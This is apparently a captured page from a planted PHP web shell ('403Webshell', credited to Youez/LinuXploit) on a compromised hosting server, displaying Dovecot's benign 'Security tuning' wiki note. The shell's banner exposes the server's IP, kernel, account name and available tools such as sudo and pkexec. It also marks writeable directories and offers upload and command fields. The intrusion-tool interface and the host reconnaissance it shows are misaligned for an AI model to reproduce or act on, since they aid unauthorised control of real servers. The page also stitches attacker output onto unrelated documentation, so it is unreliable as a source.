403Webshell
Server IP : 45.40.142.9  /  Your IP : 216.73.216.250
Web Server : Apache
System : Linux s45-40-142-9.secureserver.net 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : bayspec ( 506)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/dovecot-2.3.10.1/wiki/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/dovecot-2.3.10.1/wiki/SecurityTuning.txt
Security tuning
===============

Dovecot is pretty secure out-of-the box. It uses multiple processes and
privilege separation to isolate different parts from each others in case a
security hole is found from one part.

Some things you can do more:

 * Allocate each user their own UID and GID (see <UserIds.txt>)
 * Use a separate /dovecot-auth/ user for authentication process (see
   <UserIds.txt>)
 * You can chroot authentication and mail processes (see <Chrooting.txt>)
 * Compiling Dovecot with garbage collection ('--with-gc' configure option)
   fixes at least in theory any security holes caused by double free()s.
   However this hasn't been tested much and there may be problems.
 * There are some security related SSL settings (see
   <SSL.DovecotConfiguration.txt>)
 * Set 'first/last_valid_uid/gid' settings to contain only the range actually
   used by mail processes

(This file was created from the wiki on 2019-06-19 12:42)

Youez - 2016 - github.com/yon3zu
LinuXploit